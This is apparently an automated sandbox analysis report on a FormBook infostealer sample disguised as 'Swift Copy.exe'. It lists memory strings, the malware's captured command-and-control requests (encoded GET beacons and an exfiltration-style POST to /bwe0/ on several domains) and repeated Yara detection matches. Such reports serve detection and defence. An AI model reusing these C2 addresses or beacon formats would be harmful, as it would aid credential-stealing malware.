Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 04:30:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 393Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:30:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mogdento.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 65 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 47 44 45 4e 54 4f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 6
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: NETSTAT.EXE, 00000019.00000002.518477134.0000000003996000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9
Source: Swift Copy.exe, ImUIYlbLTIh.exe.0.dr String found in binary or memory: http://philiphanson.org/medius/book/1.0
Source: explorer.exe, 0000000B.00000000.339382801.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.323818744.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.389826737.00000000061ED000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr$
Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: NETSTAT.EXE, 00000019.00000002.518373021.00000000036A2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.expectedclosure.one/bwe0/?9rV8zl=z0a7bU3Grk9SZV
Source: NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB
Source: NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&amp;9rV8zl=M79ygOKZB
Source: unknown HTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.expectedclosure.oneConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.expectedclosure.oneUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.expectedclosure.one/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
Source: unknown DNS traffic detected: queries for: www.blackyaga.xyz
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1Host: www.blackyaga.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.expectedclosure.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1Host: www.kinemartigues.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1Host: www.epic45.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1Host: www.mogdento.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: Swift Copy.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
